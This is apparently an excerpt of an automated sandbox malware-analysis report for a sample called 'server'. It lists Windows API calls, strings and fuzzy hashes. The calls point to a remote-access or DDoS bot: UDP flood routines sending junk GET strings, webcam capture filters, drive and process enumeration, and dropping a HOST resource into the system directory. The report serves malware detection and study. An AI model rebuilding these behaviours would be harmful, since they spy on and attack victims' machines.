                                • Opcode Fuzzy Hash: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
                                • Instruction Fuzzy Hash: A83137726006082FE318DA749C55A6B7A8BFBC5370F140B2DFA67C72D1EDE59D0D82A1
                                APIs
                                • GetLogicalDriveStringsA.KERNEL32 ref: 10008381
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 100083D7
                                • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 100083F5
                                • lstrlen.KERNEL32(?), ref: 10008409
                                • lstrlen.KERNEL32(?), ref: 10008417
                                • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008436
                                • GetDriveTypeA.KERNEL32(?), ref: 1000847D
                                • lstrlen.KERNEL32(?), ref: 100084E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Drive$DiskFileFreeInfoInformationLogicalSpaceStringsTypeVolume
                                • String ID: g
                                • API String ID: 2496086942-30677878
                                • Opcode ID: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                                • Instruction ID: 7a94a0694180289e9c46b8d804f7d8816f5e215d3c8a1403c1990a7dea9b0a38
                                • Opcode Fuzzy Hash: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                                • Instruction Fuzzy Hash: 4E41C4705083869FD715CF14C880A9BB7EAFBC8744F04492DF9C987251D7B4AA09CBA2
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10004DD1
                                • WSASocketA.WS2_32 ref: 10004DEB
                                • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 10004E0E
                                • inet_addr.WS2_32(1007DD2C), ref: 10004E3D
                                • GetProcessHeap.KERNEL32(00000008,00001000), ref: 10004E4E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 10004E55
                                  • Part of subcall function 10004D70: GetCurrentProcessId.KERNEL32 ref: 10004D7F
                                • GetTickCount.KERNEL32 ref: 10004E93
                                • sendto.WS2_32(00000000,00000000,00001000,00000000,?,00000010), ref: 10004EBA
                                • Sleep.KERNEL32(00000064,?,?,00000001), ref: 10004ECF
                                • RtlExitUserThread.NTDLL(00000000,00000001), ref: 10004EE1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapProcess$AllocateCountCurrentExitSleepSocketStartupThreadTickUserinet_addrsendtosetsockopt
                                • String ID:
                                • API String ID: 4173591058-0
                                • Opcode ID: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
                                • Instruction ID: c5a2debfd89a1f44daedc798f5d2e11e4375d7b03d2956684dd0a07df8b0980b
                                • Opcode Fuzzy Hash: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
                                • Instruction Fuzzy Hash: 263138706403506BF310DF20CC4ABA677E9FF85B80F008529F695AA1D0EBF498098B26
                                APIs
                                  • Part of subcall function 10069530: CoCreateInstance.OLE32(10077228,00000000,00000001,10077168,?,?,?,?,?,10068F83,?,?), ref: 1006954E
                                  • Part of subcall function 10069530: CoCreateInstance.OLE32(10077238,00000000,00000003,10077158,?,?,?,?,?,10068F83,?,?), ref: 10069562
                                • CoCreateInstance.OLE32(10077198,00000000,00000001,100771A8,?,?,Capture Filter,?,?,?,?), ref: 10068FCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInstance
                                • String ID: *,$Capture Filter$Grabber$iavs$vids
                                • API String ID: 542301482-3686165303
                                • Opcode ID: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
                                • Instruction ID: 6b34a01a8f94a52d972c2f63ee6a2cae5e4b6e391ed04b1ad51ace7a22d3cd02
                                • Opcode Fuzzy Hash: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
                                • Instruction Fuzzy Hash: 45C126B46047019FD714CF28C894A5AB7EAFF88350F108A5DF99ACB7A1D730E946CB61
                                APIs
                                  • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                  • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                  • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                  • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 100127E5
                                • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 100127FF
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 10012825
                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 10012832
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10012854
                                • ??2@YAPAXI@Z.MSVCRT(00000100), ref: 10012876
                                • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 100128A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@Token$InformationOpenProcess$AccountCreateFirstLookupProcess32SnapshotToolhelp32_strcmpi
                                • String ID: explorer.exe
                                • API String ID: 2062827286-3187896405
                                • Opcode ID: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
                                • Instruction ID: 3c6e58a02f97abc338737f091e25ee4c367b19baec1748f45827f9b92fdf04fa
                                • Opcode Fuzzy Hash: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
                                • Instruction Fuzzy Hash: 17411AB1D01228AFDB10DF95DC85BEEBBB9FB48710F10415AF609A7280D7716A84CFA1
                                APIs
                                • wsprintfA.USER32 ref: 1000A85D
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000A882
                                • wsprintfA.USER32 ref: 1000A8F7
                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000A913
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000A937
                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 1000A93E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$Filewsprintf$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWrite
                                • String ID: Ball\$XXXXXX
                                • API String ID: 1973673485-3982136319
                                • Opcode ID: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
                                • Instruction ID: 495c6c63232d9b85305b454becab353a6f073e9b30b67b104db98610628649c6
                                • Opcode Fuzzy Hash: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
                                • Instruction Fuzzy Hash: 5331F63220070427E728CA74CC55BBB7396EBC4721F544B2DF662972C0DEF4AE088695
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E9E
                                • GetStdHandle.KERNEL32(000000F4,00406360,00000000,?,00000000,00000000), ref: 00403F74
                                • WriteFile.KERNEL32(00000000), ref: 00403F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: File$HandleModuleNameWrite
                                • String ID: B$...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                • API String ID: 3784150691-92088503
                                • Opcode ID: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
                                • Instruction ID: e2e7e3b0d966deab652d805934d5b43aed53a7e34c61163c82d84b1dec86f9c2
                                • Opcode Fuzzy Hash: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
                                • Instruction Fuzzy Hash: 6731E372A002186EDF20EB62DD46F9A77BCAB85704F50047BFA45F60C0DA78EA418A5D
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10004BD4
                                • socket.WS2_32(00000002,00000002,00000011), ref: 10004BF1
                                • htons.WS2_32 ref: 10004C1A
                                • inet_addr.WS2_32(1007DD2C), ref: 10004C2A
                                • sendto.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000,?,00000010), ref: 10004C59
                                • Sleep.KERNEL32(00000028,?,00000000,?,00000010,00000002), ref: 10004C62
                                • RtlExitUserThread.NTDLL(00000000), ref: 10004C6F
                                Strings
                                • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10004BDA, 10004C53
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitSleepStartupThreadUserhtonsinet_addrsendtosocket
                                • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                • API String ID: 3602400006-4039768343
                                • Opcode ID: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
                                • Instruction ID: 55386a69bf2c1f1f0394aeb8968783278eab3e70afa46589061ef1ece014295f
                                • Opcode Fuzzy Hash: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
                                • Instruction Fuzzy Hash: 7C1122701053A16BF300DF30CC89B6A3BA4FF89754F00061EF191972E1EBB49C08872A
                                APIs
                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F55,?,Microsoft Visual C++ Runtime Library,00012010,?,00406360,?,004063B0,?,?,?,Runtime Error!Program: ), ref: 00404CBD
                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404CD5
                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404CE6
                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404CF3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                • API String ID: 2238633743-4044615076
                                • Opcode ID: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
                                • Instruction ID: 7a0cc08ec05e3b4d564e92fce98ceeba057a3e0b493a9dfb57db353efca9b8d4
                                • Opcode Fuzzy Hash: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
                                • Instruction Fuzzy Hash: E80175B1700211EBD7219FB59C84A2B3AF8ABC4751391043BA602E22A1D6789C66DB6D
                                APIs
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E1FA
                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000E22C
                                • LocalAlloc.KERNEL32(00000040,?), ref: 1000E28B
                                • malloc.MSVCRT ref: 1000E2CC
                                • malloc.MSVCRT ref: 1000E2D7
                                • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?), ref: 1000E35E
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: malloc$AllocEnumInfoLocalOpenQueryValue
                                • String ID:
                                • API String ID: 574313380-0
                                • Opcode ID: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                                • Instruction ID: 2dbc490ccdae4f0339eaf1a45c7cb0cbb32c1b4649a87cd96ed82d0427daa14a
                                • Opcode Fuzzy Hash: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                                • Instruction Fuzzy Hash: E561BE716083559FD318CF28C884A2BBBE9EBC8790F44492CF68AD3350D671EE05CB92
                                APIs
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BD8
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BEE
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C08
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C2A
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C3A
                                • CloseWindow.USER32(?), ref: 10068C49
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C53
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C77
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C8E
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@$Close$HandleWindow
                                • String ID:
                                • API String ID: 3237098652-0
                                • Opcode ID: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
                                • Instruction ID: 47ea1eda927b8dc083e930fae728241aa0dc08fd9b84fd6a3200258ce030e435
                                • Opcode Fuzzy Hash: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
                                • Instruction Fuzzy Hash: F2416BF5600B409FC724CF69C980816B7FAFF89710B458A2DE1468BB11DB35F948CB91
                                APIs
                                • GetWindowTextA.USER32(?,?,00000400), ref: 1001206F
                                • IsWindowVisible.USER32(?), ref: 10012076
                                • lstrlen.KERNEL32(?), ref: 1001208F
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 1001209D
                                • lstrlen.KERNEL32(?), ref: 100120AA
                                • Sleep.KERNEL32(00000001), ref: 100120B3
                                • LocalSize.KERNEL32 ref: 100120BA
                                • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100120C9
                                • lstrlen.KERNEL32(?,?,?,00000042), ref: 100120E0
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Locallstrlen$AllocWindow$SizeSleepTextVisible
                                • String ID:
                                • API String ID: 2862634755-0
                                • Opcode ID: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                                • Instruction ID: 3dedb17b5f53bc68f4680ffa48498177935556d525806c47c9f4f8922cb1ae20
                                • Opcode Fuzzy Hash: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                                • Instruction Fuzzy Hash: D1215EB2204355ABE714DF64CC85AAB73E9FB88300F414928FB5697240EBB4E949CB65
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 10012992
                                • GetThreadDesktop.USER32(00000000), ref: 10012999
                                • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
                                • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
                                • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
                                • lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
                                • SetThreadDesktop.USER32(00000000), ref: 10012A18
                                • CloseDesktop.USER32(00000000), ref: 10012A30
                                • CloseDesktop.USER32(00000000), ref: 10012A33
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                • String ID:
                                • API String ID: 3718465862-0
                                • Opcode ID: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                                • Instruction ID: c967bd72d2f0f6242c0139ef5eee9d5da27d55a5de029f67c8097565ae890da2
                                • Opcode Fuzzy Hash: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                                • Instruction Fuzzy Hash: B2110871104349ABF310DB60CC4AFDB7799EB88700F000829FB4196191EFB4A94986A2
                                APIs
                                • GetStringTypeW.KERNEL32(00000001,0040642C,00000001,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040520D
                                • GetStringTypeA.KERNEL32(00000000,00000001,00406428,00000001,?,?,00000000,00000000,00000001), ref: 00405227
                                • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040525B
                                • MultiByteToWideChar.KERNEL32(oD@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00405293
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052E9
                                • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: StringType$ByteCharMultiWide
                                • String ID: oD@
                                • API String ID: 3852931651-4270158488
                                • Opcode ID: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
                                • Instruction ID: 4e9507d7fde2c7550347533a2b4aeff6ceb3887050b9cf78e8730f58af229727
                                • Opcode Fuzzy Hash: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
                                • Instruction Fuzzy Hash: 04416F71640619EFCF209F94DD85DAF3FB8EB08790F10443AF912E6290C37989618FA9
                                APIs
                                • inet_addr.WS2_32(?), ref: 10006317
                                • gethostbyname.WS2_32(?), ref: 10006323
                                • inet_ntoa.WS2_32(?), ref: 1000634D
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100063BB
                                • CloseHandle.KERNEL32(00000000), ref: 100063BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005F50,00000000,00000000,00000000), ref: 100063FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
